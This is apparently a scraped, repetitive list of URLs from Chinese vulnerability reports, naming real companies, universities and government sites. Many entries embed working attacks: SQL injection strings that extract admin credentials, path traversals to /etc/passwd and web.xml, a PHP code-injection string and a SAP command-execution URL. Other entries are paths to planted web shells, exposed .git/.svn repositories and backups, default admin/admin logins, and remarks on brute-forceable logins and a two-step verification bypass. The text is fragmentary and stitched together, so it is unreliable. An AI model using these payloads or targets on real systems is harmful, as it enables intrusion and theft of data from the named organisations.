http://**.**.**.**/ua/user_respon.php http://**.**.**.**/ua/user_respon.php//module/action/param1/$%7B@phpinfo%28%29%7D http://**.**.**.**/NewsDetail.aspx?NewsId=20151013_170730 http://**.**.**.**/web1/aboutus/about/article http://**.**.**.**/div.php?act=publicList&cid=2&count=4 http://rd.haierpeople.cn/1024.aspx http://rd.haierpeople.cn/ASPXSpy.aspx http://rd.haierpeople.cn/Home/Main http://**.**.**.** http://ip.7k7k.com/resin-admin/ http://so.7k7k.com/manage/ http://wx.7k7k.com/phpmyadmin http://v.7k7k.com/info.php http://www.7k7k.com/robots.txt/x.php http://client.dl.126.net/pcmail/dashi/mail.exe下载了Windows版,安装后输入邮箱和密码就直接进入了邮箱,没有让输入短信验证码,就这么绕过了网易邮箱的登录二次验证。 http://test.lxzq.com.cn/web/space/main.html http://**.**.**.**:8080/ http://tuchong.com/rest/.git/config cn:server/tuchong-api.git http://**.**.**.**/index.php https://mail.tsinghua.edu.cn/ http://**.**.**.**/ http://**.**.**.**/jwz/gljg/xsc/xscxsglk/xsc/edit/mbook.asp?class=1 http://**.**.**.**/ http://**.**.**.**/bugs/wooyun-2015-0116233这是洞主提供的4个注入点 http://vps.ule.com/vpsAdmin/admin/main.do dbfen.com/dbfen.com dbfen.com/dbfen.com dbfen.com/dbfen.com http://share.cetools.cn/index/login.asp(存在弱口令,以及没验证码也可进行爆破) http://os.cetools.cn/yl.asp?id=2(存在SQL注入) http://wiki.tuniu.org/display/www/BBS可以下载到配置文件config_inc.php http://**.**.**.**/News.asp?Method=View&NewsID=169 http://www.lvmama.com/zt/promo/mgwq/ www.lvmama.com http://www.lvmama.com/zt/promo/mgwq/ http://antieye.edaijia.cn/ http://113.106.204.64/login http://market.oa.duoyi.com/func/view.aspx?act=sys.login http://cfq.southmoney.com http://**.**.**.**/?mod=acp&do=index http://**.**.**.**/?mod=goods&do=index&class_id=25,参数do过滤不严,导致可以包含任意文件: http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://59.56.25.192/info.php http://180.76.145.239/.git/config http://wanxue.jiaoyu.baidu.com/examples/jsp/ http://scan.safe.baidu.com/.svn/entries http://**.**.**.**/getDetailedContent.action?snavBz=2&contId=7062存在命令执行漏洞 http://ditan.kdnet.net/2012/save.php?artificeid=15&_=1445364118284 http://**.**.**.**/bugs/wooyun-2014-061802 http://**.**.**.**/ArticleList.asp?classtype=gb&lybclass=%C1%F4%D1%D4%B0%E5 http://**.**.**.**/ArticleList.asp?classtype=gb&lybclass=%C1%F4%D1%D4%B0%E5 http://**.**.**.**/ArticleList.asp?classtype=gb&lybclass=%C1%F4%D1%D4%B0%E5 http://**.**.**.**/ArticleList.asp?classtype=gb&lybclass=%C1%F4%D1%D4%B0%E5 http://**.**.**.**/ArticleList.asp?classtype=gb&lybclass=%C1%F4%D1%D4%B0%E5 http://**.**.**.**/dbcenter/ http://**.**.**.**/dbcenter/irecord/countyRecordTotal.do?userID=20037511 http://**.**.**.**/api/2.0.3/upgrade.php?plat=android&proct=mierapp&versioncode=20150807&apiCode=4 http://baiyin.southmoney.com/ http://baiyin.southmoney.com/admin.php http://**.**.**.**/lm/front/mailwrite_over.jsp?editpagename=/../../../../../../../../../../../../../etc/passwd%00.ftl http://**.**.**.**/lm/front/mailwrite_over.jsp?editpagename=/../../../../../../../../../../../../../etc/passwd%00.ftl http://**.**.**.**/lm/front/mailwrite_over.jsp?editpagename=/../../../../../../../../../../../../../etc/passwd%00.ftl http://**.**.**.**/lm/front/mailwrite_over.jsp?editpagename=/../../../../../../../../../../../../../etc/passwd%00.ftl http://**.**.**.**/lm/front/mailwrite_over.jsp?editpagename=/../../../../../../../../../../../../../etc/passwd%00.ftl http://**.**.**.**/lm/front/mailwrite_over.jsp?editpagename=/../../../../../../../../../../../../../etc/passwd%00.ftl http://**.**.**.**/lm/front/mailwrite_over.jsp?editpagename=/../../../../../../../../../../../../../etc/passwd%00.ftl http://**.**.**.**/lm/front/mailwrite_over.jsp?editpagename=/../../../../../../../../../../../../../etc/passwd%00.ftl http://**.**.**.**/lm/front/mailwrite_over.jsp?editpagename=/../../../../../../../../../../../../../etc/passwd%00.ftl http://**.**.**.**/EmployInfo/ImageDownloadAction.action存在命令执行漏洞 http://daren.sc.weibo.com/h5/front/brand?type=3 http://jz.shangdu.com/Search.aspx?p_name=eBOPRQX http://**.**.**.**) http://**.**.**.**/Home/Index/teacher?id=34 http://**.**.**.**:9080/wscgs/wms/login.jsp http://**.**.**.**/ http://**.**.**.**/getBackPassword http://**.**.**.**/cja/guestcj/message.asp?id=2333 http://www.greentownhospital.com http://www.greentownhospital.com/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@%60\%27%60%20/*!50000union*//*!50000select*/1,2,3,%28select%20CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60%20limit+0,1%29,5,6,7,8,9%23@%60\%27%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294 http://z.admin5.com/index.php?pid=6&r=help/category http://**.**.**.**/html/netproject.html?id=1 http://**.**.**.**/ADVPLAYLIST12/ http://**.**.**.**/ADVSEVER12/ http://**.**.**.**/NewForIF/ http://**.**.**.**:84/Login.aspx http://**.**.**.**:86/Login.aspx http://**.**.**.**:85/Login.aspx http://**.**.**.**:86/Login.aspx http://**.**.**.**:84/Login.aspx http://**.**.**.**/sherc/share/getapplyres.jsp?userid=4281 http://**.**.**.**:8080/shlweb/bbs/index.jsp?sid=115162&pno= http://**.**.**.**/sherc/platform/resmanage/TaskList.jsp?userid=null http://**.**.**.**/sherc/platform/usermanage/checkUnit.jsp?unit= http://**.**.**.**/sherc/platform/resmanage/searchList.jsp?Place=SEARCH&Titles= http://**.**.**.**/Template/Investigate.aspx?ID=34 http://**.**.**.**/system/webos/Template/Interview_result.aspx?ID=15 http://**.**.**.**/Template/Investigate_result.aspx?ID=34 http://**.**.**.**/system/webos/Template/Interview_result.aspx?ID=15 http://**.**.**.**/html/personal/Search_List3.asp?zw=1900&page=2 http://**.**.**.**/html/personal/passwordsave.asp http://**.**.**.**/html/news/article.asp?cid=18&top=6&asize=13 http://**.**.**.**/html/company/com_search_list.asp http://**.**.**.**/3G/ccompanynew.asp?cid=664552 http://**.**.**.**/html/news/article.asp?cid=18&top=30&asize=12&isdt=y http://221.192.235.83:3001/index.aspx http://passport.voc.com.cn http://fl.weihai.tv/city/weiHai/job.php?job=allnewinfo&rows=16&leng=&iframeID=allnewinfo http://cemftp.ce-air.com/yyoa/index.jsp http://wisdom.120.net/m http://**.**.**.**/blog/my/module/definde/ArticleList.jsp?blog_id=&module_id=482 http://**.**.**.**/blog/my/module/definde/ViewArticle.jsp?blog_id=&ArticleId=127 http://**.**.**.**/blog/my/module/news/ViewNews.jsp?blog_id=&NewsId=351 http://**.**.**.**/sendMail.do http://**.**.**.**/Blog/InitMess http://**.**.**.**/SyntInquiry/SyntInquiry_Ajax.jsp http://**.**.**.**/bugs/wooyun-2015-0131525 http://www.changan-mazda.com.cn/excellenceplan/position?type=&keyword=3 http://www.changan-mazda.com.cn/search?q=Mazda3%20AXELA&t=1 http://211.154.173.238/console/ http://**.**.**.**/WFManager/loginAction_getCheckCodeImg.action http://**.**.**.**/App_Site/SiteSearch.aspx?Title=123 http://**.**.**.**/App_Site/SiteSearch.aspx?Title=123 http://**.**.**.**/App_Site/SiteSearch.aspx?Title=123 http://**.**.**.**/App_Site/SiteSearch.aspx?Title=123 http://**.**.**.**/App_Site/SiteSearch.aspx?Title=123 http://**.**.**.**/App_Site/SiteSearch.aspx?Title=123 http://**.**.**.**/App_Site/SiteSearch.aspx?Title=123 http://**.**.**.**/index.php?m=column&a=getcolumn&channel=107 http://**.**.**.**/index.php?m=column&a=getcolumn&channel=107 http://mall.chexun.com/admin/friend_upfile.html http://www.m5.baidu.com手机端存在xss漏洞 http://**.**.**.**/lp.php?mc=1&sort_id=42&suozai=1&tp=1 http://**.**.**.**/n.php?p_id=5&sort_id=44&tp=0 http://**.**.**.**/download.php?url=任意文件 http://**.**.**.**/jyuserinfo.php?id=111568'%20and%201%3d2%20and%20'a'%3d'a http://10jia.letv.com/ http://vip.ufida.com.cn/Frame/Index.aspx http://vip.ufida.com.cn/RepositorySearchInfo/DoctInfo.aspx?ReposID=38d4a08e-8b79-4de7-8566-30aecfb1d56f http://vip.ufida.com.cn/RepositorySearchInfo/DoctList.aspx?Type=MainPageClick http://gti.ailvxing.com/skin/ailvxing/js/ask.min.js?v=201500318 http://**.**.**.**/search/prosearch.aspx?atid=3767&brand=3770&brandname=%B9?&selected=amonyup&sort=2&sort1=1 http://**.**.**.** http://**.**.**.**/TryDown.htm http://**.**.**/Lesktop/sendfile.aspx http://**.**.**//Lesktop/sendfile.aspx http://**.**.**//Lesktop/sendfile.aspx http://**.**.**//Lesktop/sendfile.aspx http://**.**.**/Lesktop/sendfile.aspx http://**.**.**//Lesktop/sendfile.aspx http://**.**.**//Lesktop/sendfile.aspx http://**.**.**/Lesktop/sendfile.aspx http://**.**.**//Lesktop/sendfile.aspx http://**.**.**/Lesktop/sendfile.aspx http://**.**.**//Lesktop/sendfile.aspx http://**.**.**/Lesktop/sendfile.aspx http://**.**.**//Lesktop/sendfile.aspx http://**.**.**/Lesktop/sendfile.aspx http://**.**.**/Lesktop/sendfile.aspx http://**.**.**//Lesktop/sendfile.aspx http://**.**.**/Lesktop/sendfile.aspx http://**.**.**/Lesktop/sendfile.aspx http://**.**.**/Lesktop/sendfile.aspx http://**.**.**/Lesktop/sendfile.aspx http://**.**.**/Lesktop/sendfile.aspx http://**.**.**/Lesktop/sendfile.aspx http://**.**.**/Lesktop/sendfile.aspx http://**.**.**/Lesktop/sendfile.aspx http://**.**.**/Lesktop/sendfile.aspx http://**.**.**/Lesktop/sendfile.aspx_ http://**.**.**/Lesktop/sendfile.aspx http://**.**.**/Lesktop/sendfile.aspx http://**.**.**/Lesktop/sendfile.aspx http://**.**.**/Lesktop/sendfile.aspx http://**.**.**/Lesktop/sendfile.aspx_ http://**.**.**//Lesktop/sendfile.aspx_ http://**.**.**//Lesktop/sendfile.aspx http://**.**.**//Lesktop/sendfile.aspx http://**.**.**//Lesktop/sendfile.aspx http://**.**.**//Lesktop/sendfile.aspx_ http://**.**.**/Lesktop/sendfile.aspx_ http://**.**.**//Lesktop/sendfile.aspx http://**.**.**//Lesktop/sendfile.aspx_ http://**.**.**//Lesktop/sendfile.aspx http://**.**.**//Lesktop/sendfile.aspx http://**.**.**/Lesktop/Upload.aspx官网demo_ http://**.**.**//Lesktop/Upload.aspx鸡泽县人口和计划生育局_ http://**.**.**//Lesktop/Upload.aspx将乐县司法综合服务大平台_ http://**.**.**//Lesktop/Upload.aspx广西动物卫生监督所_ http://**.**.**/Lesktop/Upload.aspx余姚辰茂河姆渡酒店_ http://**.**.**//Lesktop/Upload.aspx中航计量所_ http://**.**.**//Lesktop/Upload.aspx济宁广汇汽车销售服务有限公司_ http://**.**.**/Lesktop/sendfile.aspx http://**.**.**//Lesktop/Upload.aspx渝中教研网_ http://**.**.**/Lesktop/Upload.aspx厦门夏商百货集团_ http://**.**.**//Lesktop/Upload.aspx_ http://**.**.**/Lesktop/Upload.aspx_ http://**.**.**//Lesktop/Upload.aspx_ http://**.**.**/Lesktop/sendfile.aspx http://**.**.**/Lesktop/Upload.aspx_ http://**.**.**//Lesktop/Upload.aspx_ http://**.**.**/Lesktop/Upload.aspx http://**.**.**/Lesktop/Upload.aspx http://**.**.**/Lesktop/Upload.aspx_ http://**.**.**/Lesktop/Upload.aspx_ http://**.**.**/Lesktop/Upload.aspx_ http://**.**.**/Lesktop/Upload.aspx http://**.**.**/Lesktop/sendfile.aspx http://**.**.**/Lesktop/Upload.aspx_ http://**.**.**/Lesktop/Upload.aspx_ http://**.**.**/Lesktop/sendfile.aspx_ http://**.**.**/Lesktop/sendfile.aspx http://**.**.**/Lesktop/Upload.aspx-_ http://**.**.**/Lesktop/Upload.aspx_ http://**.**.**/Lesktop/Upload.aspx_ http://**.**.**/Lesktop/sendfile.aspx_ http://**.**.**//Lesktop/sendfile.aspx_ http://**.**.**//Lesktop/Upload.aspx_ http://**.**.**//Lesktop/Upload.aspx_ http://**.**.**//Lesktop/Upload.aspx_ http://**.**.**//Lesktop/sendfile.aspx_ http://**.**.**/Lesktop/sendfile.aspx_ http://**.**.**//Lesktop/Upload.aspx_ http://**.**.**//Lesktop/sendfile.aspx_ http://**.**.**//Lesktop/Upload.aspx_ http://**.**.**//Lesktop/Upload.aspx http://**.**.**.**/admin.aspx?s=adminlogin username:admin password:admin http://soccer.m.sohu.com/GlobalSoccerCenter/Reception/InceludSchedule?dateTime=2015-10-21 https://**.**.**.**/sidy-git/CIB-CRS/blob/6cc76d4ff724f30cfe127e7e5c9d1fa7365978fd/readme.txt https://**.**.**.**/advanced/advanced?action=dev&t=advanced/dev&token=287168589&lang=zh_CN AppID:wxe90f57504d4944c9 http://**.**.**.**/cib_crs http://www.vip.com/beauty.php?cid=9&stock=9&order=9&page=9 http://**.**.**.**:8090/searchServer/menu/index.do http://zjc.sicnu.edu.cn/zjc-career-websys-2009/zjc-career/sd_zjc_career_login_admin.aspx http://**.**.**.**:188/default.asp http://**.**.**.**:188/too1/getpwd.asp?user=admin http://**.**.**.**/WebVehicleInspection/ http://**.**.**.**/WebVehicleInspection/Admin/login.jsp http://yun.admin5.com www.acunetix-referrer.com http://shop.hsw.cn http://**.**.**.**/Backstage/ http://**.**.**.**/searchbug.php http://**.**.**.**/mmcadmin/ http://**.**.**.**/themes/1321599208/info.php。日期是2015-09-19 http://**.**.**.**/bugs/wooyun-2015-0126451 http://www.now.cn:80/ www.now.cn http://i.muzhiwan.com/.svn/entries http://user.muzhiwan.com/.svn/entries http://www.lvmama.com/lvyou/d-hongcun100477.html http://59.151.27.143/login.jsp http://wooyun.org/bugs/wooyun-2015-0118137 http://www.bkzs.sdu.edu.cn/schoolday/serch/ https://**.**.**.**/manager/html http://**.**.**.** http://**.**.**.**:8822/ https://**.**.**.**/uc-oauth/rest/relatedacctlogin/ https://**.**.**.** http://**.**.**.**:8822/inpayCustomer/ http://**.**.**.**:8822/inpayCustomer/ http://customer.hiiir.com/.svn/entries http://buzz.hiiir.com/.svn/entries http://bike.hiiir.com/.svn/entries http://ad.hiiir.com/.svn/entries https://60.199.208.111/.svn/entries http://buzz.hiiir.com/.svn/entries http://customer.hiiir.com/.svn/entries http://data.hiiir.com/.svn/entries http://event.hiiir.com/.svn/entries http://family.hiiir.com/.svn/entries http://fb.hiiir.com/.svn/entries http://flash.hiiir.com/.svn/entries http://hero.hiiir.com/.svn/entries http://log.hiiir.com/.svn/entries http://manager.hiiir.com/.svn/entries http://mo.hiiir.com/.svn/entries http://media.hiiir.com/.svn/entries http://partners.hiiir.com/.svn/entries http://pay.hiiir.com/.svn/entries http://ping.hiiir.com/.svn/entries http://store.hiiir.com/.svn/entries http://style.hiiir.com/.svn/entries http://time.hiiir.com/.svn/entries http://**.**.**.**/index.php?m=content&c=diy&a=member_lists_ajax&typeid=1&groupid= http://yingke.cn/product/moviecard.aspx?cityid=11 http://www.gkzj.com/news_show.php?id=385 http://www.gkzj.com/news_show.php?id=385 jdbc:oracle:thin:@**.**.**.**:1521:abwsdj https://**.**.**.**/dfsq1311/wechat http://**.**.**.**/index http://**.**.**.**/bugs/wooyun-2010-0134796 http://**.**.**.**/Data/ http://**.**.**.**/includes/ http://**.**.**.**/Test/ http://**.**.**.**/manager jdbc:oracle:thin:@**.**.**.**:1521:orcl http://interface.api.haodai.com/capi/Ask/getTopTags http://**.**.**.**/coremail/index.jsp http://cxb.chexiang.com/service/peccancy/getPeccancyInfo/2 http://car.itjuzi.com http://icar.cqins.com:8080/login.action http://**.**.**.**/teenspecial/nathan100/details.php?id=32 http://**.**.**.**/teenspecial/nathan100/details.php?id=32 http://**.**.**.**/info_show.php?id=1014 http://**.**.**.**/picture_show.php?id=2098 http://**.**.**.**/search.php?area=title&keyword=1&page=3 http://au.umeng.com/api/check_app_update http://**.**.**.**/ http://**.**.**.**/sts/stsIndex/testIndex/articleView.action?articleId=1439450298756&dictId=1341139113981449也存在命令执行漏洞 http://photo.hsw.cn/work/getRecommendWork?id=10037&p=1 http://**.**.**.**/site/frontpage/paihang/Ranking.action?category=1200912281003300007存在命令执行漏洞 http://**.**.**.**/bugs/wooyun-2010-065153 http://www.moretv.com.cn/.git/config cn:account/officialWebsite.git www.lvmama.com http://www.lvmama.com https://**.**.**.**/fishcy521/tdd_test/blob/cb00ec08f2137c9c27ca9da30c3a3631e8e360f5/tdd-rms/src/main/java/com/rms/commons/dbcp/EmailFactory.java http://**.**.**.**:8080/com.drkj.faceRecog/action/frontPage/passport/workerLoginGet.action存在命令执行漏洞 http://survey.minanins.com:9001/ http://survey.minanins.com:9001/console http://survey.minanins.com:9001/JspSpyJDK5/JspSpyJDK5.jsp ftp://**.**.**.**/ http://gateway.minanins.com:9001 http://gateway.minanins.com:9001/console http://gateway.minanins.com:9001/jay/jay.jsp http://**.**.**.**:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cmd.exe http://180.153.17.43:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cmd.exe http://180.153.17.43/names.nsf http://service.sangfor.com/monitor/ http://service.sangfor.com/monitor/index_server.php?nd=1445488102899 http://dealer.chexun.com/admin/index.aspx display:none display:none display:none display:none display:none display:none display:none http://**.**.**.**/collegesdynamic.html http://**.**.**.**/jobfairs.html http://**.**.**.**/jobguide.html http://**.**.**.** http://**.**.**.**/notice.html http://**.**.**.** http://**.**.**.**:80/ http://**.**.**.**/lm/front/api/opr_datacall.jsp?fn_billstatus=E&vc_id=1 http://**.**.**.**/lm/front/api/opr_datacall.jsp?fn_billstatus=E&vc_id=1 http://**.**.**.**/lm/front/api/opr_datacall.jsp?fn_billstatus=E&vc_id=1 http://**.**.**.**:82/lm/front/api/opr_datacall.jsp?fn_billstatus=E&vc_id=1 http://**.**.**.**/card.php?id=1 cdn.admin5.com/dns.aspx?tn=122150091 cdn.admin5.com/dns.aspx?tn=122150091 http://www.cetools.cn/index.php/cetools/login http://www.cetools.cn/index.php/cetools_admin/login http://**.**.**.**/script/syslogin.php http://wlgl.dfl.com.cn/dfqcmy/admin/newsadmin.asp?AdminType=9 http://db.cate.hsw.cn http://interface.api.haodai.com/bapi/OrderDeal/getOrderList http://**.**.**.**/unit.aspx?userid=6643ca6c-66f4-4297-a0b7-45c17687efc3 http://**.**.**.**/search/ http://update.funshion.com/login/index.php?c=login&a=login&so=begin http://**.**.**.**/userLogin!loginWithoutCode.action http://**.**.**.**/Announce.asp?ChannelID=1看图 http://www.ahhailiang.com.cn/news_list.php?act=13%27 http://203.130.41.40:6180/jsp/main.jsp http://www.huozhan.com/SupplierItemCate_searchProductList.do?SUPPLIER_CODE=010375&AREA_CODE=010BJ http://ccw.infinitus.com.cn/hollycrm/login.jsp http://ccw.infinitus.com.cn/foo1/index.jsp http://**.**.**.**/hd/jlzzds/index.html http://panpan.efotile.com/website/Default.aspx uid:kf_9729_ISME9754_264,tid:1445472411226812 http://panpan.efotile.com/SNSClub/Club_SeniorApplyEdit.aspx?id=621 http://bbs.chexun.com/api/userfav.php?uid=null&type=2&id=3004&callback=collectStatus2&m=getishave http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://help.letvcloud.com/Login.jsp?redirect=Main http://www.jkxg.zjut.edu.cn/loginAction!logon http://**.**.**.**/coremail/index.jsp http://111.161.24.187/adm/ http://111.161.24.187/adm/.svn/entries http://**.**.**.**/注入点参数weikeID http://**.**.**.**/District/MicroLessonVideoPlaying/MicroLessonVideoPlay.aspx?weikeID=2294&videoID=14afc08b-0bde-44fd-8e7f-e2907e4c42b4&fid=6526 http://**.**.**.**/info.php?action=about&sortName=about_4 http://www.hdpower.net http://www.hdpower.net/journalx/editorInChiefLogOn.action?mag_Id=1 http://dz2th.300.cn/02/first/video_detail.asp?id=331 http://dz2th.300.cn/02/first/pwticket.asp?id=314 http://dz2th.300.cn/02/first/upps.asp?formname=form1&editname=webpic2 http://**.**.**.**:1000/ http://**.**.**.**/ http://183.62.40.31/defaultroot/work_flow/formOptJSPUpload.jsp?flag=1 http://183.62.40.31/defaultroot/work_flow/mkzy.jsp http://183.62.40.31/jmx-console/ http://www.bkzs.sdu.edu.cn/queryadmit?examno=%27xor%28if%28now%28%29=sysdate%28%29%20and%20ascii%28mid%28@@datadir,1,1%29%29%3E1,sleep%281%29,1%29%29or%27b&idcard=e&name=c&year=2015&tn=monline_4_dg http://**.**.**.**/JspFron/twopage.jsp?type=1&infoid=150206145145 http://**.**.**.**:802/admin/sch/print/dad_print?page=964# http://yun.admin5.com www.acunetix-referrer.com http://**.**.**.**/ http://shop2.csdn.net/ http://shop2.csdn.net/flow.php?step=consignee&direct_shopping=1 index.php/welcome http://**.**.**.**/ http://**.**.**.**/kjxxw.php?id=112815 http://**.**.**.**/bf.zip http://jiang.178.com/这个接口好像是178旗下一款游戏的登录接口,登录位置没有验证码没有限制 http://www.yiliysr.com/cms/memberlist.php http://asc.ecnu.edu.cn/ http://asc.ecnu.edu.cn/admin/index.php http://sxd.178.com/大斗魂游戏登录的地方没有登录错误次数IP之类的限制,用户名密码明文传输的,感觉可以撞库用户的 http://**.**.**.**/201415_hist6011d.html?id=2706 http://**.**.**.**/201415_hist6011d.html?id=2706 index.php/site/login http://sfzx.nwpu.edu.cn:80/jisuanji/reform_1.asp?id=1 http://sfzx.nwpu.edu.cn:80/jisuanji/synopsis4_1.asp?id=2 http://sfzx.nwpu.edu.cn:80/wuli/shownews.asp?art_id=3 http://183.62.40.31/defaultroot/work_flow/formStartJSPUpload.jsp http://183.62.40.31/defaultroot/netdisk/download_netdisk.jsp?path=1&fileName=../../WEB-INF/web&fileExtName=xml&fileSaveName=x http://183.62.40.31/defaultroot/information_manager/informationmanager_download.jsp?path=..&FileName=WEB-INF/web.xml&name=x http://**.**.**.**/ http://**.**.**.**/personal/reg/my_regone.jsp http://**.**.**.**/personal/reg/my_regone.jsp www.lvmama.com http://www.lvmama.com http://**.**.**.**/index.html http://**.**.**.**/member/resetPwd.action http://sinopharmd.com/info_detail.asp?id=56 http://user.ihaier.com/login?service=http%3A%2F%2Fwww.ihaier.com%2FPassport%2Findex%2Findex http://**.**.**.**/ http://**.**.**.**/gentleCMS/login/login.do http://oa.120.net/login/ http://**.**.**.**/info.php?code=000300040004 http://114.141.166.196:7001/adp/login_new.jsp?popup=false http://114.141.166.196:7001/console/login/LoginForm.jsp http://114.242.113.96:7001/uddiexplorer/SearchPublicRegistries.jsp?operator=http://localhost:7002&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search http://103.47.87.72:7001/otcwms/security/loginInit.action http://aaa.daojia.com.cn/food_search.php?r=5069&a=1&char=Y http://**.**.**.**/aboutus/webnewslist5.asp?typeid=9 http://**.**.**.**/aboutus/webnewslist5.asp?typeid=8%2b1 http://eduadmin.open.com.cn/login.aspx ftp://14.17.122.200 ftp://14.17.122.200/web/Systool/autoftp/task.ini http://**.**.**.**/admin/login http://dbr-bulk-shared-b-atc.evip.aol.com/xmlrpc http://my.oppo.com/auth/login?callback=http://store.oppo.com/user/orders www.52000000@qq.com www.350948926@qq.com http://**.**.**.**/InformationCat.aspx?newsType=030106 http://**.**.**.**/MyShowCat.aspx?newsType=01 ftp://**.**.**.**/dbback/ http://www.zf_**.**.**.**/GetStuCheckinInfo soap:Envelope xmlns:xsi="http://**.**.**.**/2001/XMLSchema-instance xmlns:xsd="http://**.**.**.**/2001/XMLSchema xmlns:soapenc="http://**.**.**.**/soap/encoding/ xmlns:tns="http://**.**.**.**/ xmlns:types="http://**.**.**.**/encodedTypes xmlns:soap="http://**.**.**.**/soap/envelope/ soap:Body soap:encodingStyle="http://**.**.**.**/soap/encoding/ q1:GetStuCheckinInfo xmlns:q1="http://www.zf_**.**.**.**/GetStuCheckinInfo xsi:type="xsd:string xsi:type="xsd:string xsi:type="xsd:string q1:GetStuCheckinInfo soap:Body soap:Envelope xsi:type="xsd:string xsi:type="xsd:string xsi:type="xsd:string jdbc:oracle:thin:@**.**.**.**:1521/HGK http://interface.api.haodai.com/capi/XdyComment/getDetail http://**.**.**.**/tw/ForumDetail.php?DSCDOCTYPID=0kzokc61n8lc4fj8&DSCDOCID=00c7od2x3fbmhaj8 http://**.**.**.**/tw/ForumDetail.php?DSCDOCTYPID=0kzokc61n8lc4fj8&DSCDOCID=00c7od2x3fbmhaj8 http://180.168.192.54/axatp/login.do http://www.infinitus-int.com/.svn/entries http://**.**.**.**:9090/trilink/expert_LoginExpert_toLogin_n.action存在命令执行漏洞 http://**.**.**.**:9090/trilink/sysmanage_Login_doLoginOut_n.action http://**.**.**.**:9090/trilink/expert_LoginExpert_toLogin_n.action存在post注入 https://ihome.cofco.com htts://mail.ihome.cofco.com http://nc.cofco.com http://interface.api.haodai.com/bapi/Xdq/getUserInfo http://**.**.**.**:8090/vj/admin/classGroup/addBook.aspx http://**.**.**.**/vj/admin/classGroup/addBook.aspx http://**.**.**.**/admin/classGroup/addBook.aspx http://Campus.Dianhun.Cn/ http://Campus.Dianhun.Cn/是Apache的。 http://Mpl.M3guo.Com/admincp.php?mod=login http://sso.17m3.com/ http://pay.17m3.com/ http://i.17m3.com/ http://passport.m3guo.com/ http://**.**.**.**/oa/letterAction.do?step=studentLetterQuery&id= http://open.muzhiwan.com:80/ http://**.**.**.**/eassso/login http://**.**.**.**/about.asp?id=23 http://**.**.**.**/khal.html http://**.**.**.**/wcm/customform/list?projectid=50 http://**.**.**.**/wcm/customform/list?projectid=148 http://**.**.**.**/wcm/customform/list?projectid=341 http://**.**.**.**/wcm/customform/list?projectid=687 http://**.**.**.**/wcm/customform/list?projectid=182 http://**.**.**.**/wcm/customform/list?projectid=160 http://**.**.**.**:8002/wcm/customform/list?projectid=612 http://**.**.**.**/wcm/customform/list?projectid=151 http://**.**.**.**/wcm/customform/list?projectid=28 http://**.**.**.**/wcm/customform/list?projectid=314&SFGK=%E6%98%AF&State=3 http://**.**.**.**/wcm/customform/list?projectid=592 http://**.**.**.**:8080/CMS/content/previewArticle.action存在命令执行漏洞 http://hereci.haier.com/ http://**.**.**.**/news/read_news.php?nid=1357 http://**.**.**.**/news/read_news.php?nid=1357 http://oa.tsinghua-zj.edu.cn/jsoa/login.jsp http://**.**.**.**/ http://oa.tongji.edu.cn/messager/users.data http://oa.tongji.edu.cn/login/Login.jsp?logintype=1 http://oa.tongji.edu.cn:89/login.do?message=103&verify= http://**.**.**.**/articlelist.asp?sp=False&classtype=article&big=%D1%A7%D0%A3%B8%C5%BF%F6 http://**.**.**.**/articlelist.asp?sp=False&classtype=article&big=%D1%A7%D0%A3%B8%C5%BF%F6 http://**.**.**.**/articlelist.asp?sp=False&classtype=article&big=%D1%A7%D0%A3%B8%C5%BF%F6 http://**.**.**.**/articlelist.asp?sp=False&classtype=article&big=%D1%A7%D0%A3%B8%C5%BF%F6 http://**.**.**.**/articlelist.asp?sp=False&classtype=article&big=%D1%A7%D0%A3%B8%C5%BF%F6 http://oa.szahotel.com/c6/JHSoft.Web.Login/GetPassWord.aspx?flag=getEmail&UserName=1111 http://www.shenzhenair.com/module/.svn/entries http://www.shenzhenair.com/module/wshdp/.svn/entries http://www.shenzhenair.com/ticketBookingFlow/.svn/entries http://atmsp.whut.edu.cn/admin/show.php?dno=3720 http://**.**.**.**/search?keyword=aaa http://**.**.**.**/kjzb/aqkj/201111/t20111125_189483.htm http://book.huatu.com/z.zip; http://tiku.huatu.com/cdn.tar.bz2; http://zw.huatu.com/zhiwei2015.tar http://zw.huatu.com/buweisearch.tar http://book.huatu.com/z.zip http://tiku.huatu.com/cdn.tar.bz2 http://zw.huatu.com/zhiwei2015.tar http://zw.huatu.com/buweisearch.tar http://oa.gtadata.com/C6//Jhsoft.Web.login/NewView.aspx?ID=1 http://**.**.**.**/bugs/wooyun-2015-0137257 http://**.**.**.**/login.aspx http://dingzhi.8684.cn/ajax.php?act=line_book_num_with_me&ecity=shanghai%22 http://admin.300.cn/login.html http://**.**.**.**/orgstuff/index.php?code=list&ids=1&launage=gb http://**.**.**.**/orgstuff/index.php?code=list&ids=1&launage=gb http://61.158.140.6/colorring/manager/ring_user/myTimeRing_day.jsp?craccount=11111111111&isCrm=0&pright=1-6 UserName:admin http://www.senhuayun.com/index.action http://**.**.**.**/bugs/wooyun-2010-098676 http://**.**.**.**/bsznlist.php?sid=14 http://**.**.**.**/info.php?id=1 http://117.121.20.237:8080/ http://117.121.20.238:8080/ http://117.121.20.239:8080/ http://117.121.20.240:8080/ http://117.121.20.241:8080/ http://117.121.20.242:8080/ http://117.121.20.243:8080/ http://117.121.20.244:8080/ http://117.121.20.228:8080/login.do http://117.121.20.245:8080/login.do http://117.121.20.246:8080/login.do http://117.121.20.247:8080/login.do http://117.121.20.248:8080/index.do http://117.121.20.249:8080/index.do http://117.121.20.250:8080/index.do http://117.121.20.251:8080/index.do http://117.121.20.242:8080/index.do http://**.**.**.**:8090/ http://**.**.**.**/ http://**.**.**.**:8090/vj/admin/classGroup/xyDonateMoneyAdd.aspx http://**.**.**.**:8090/vj/admin/classGroup/activeRecAdd.aspx http://**.**.**.**:8090/vj/admin/classGroup/activeRecEdit.aspx 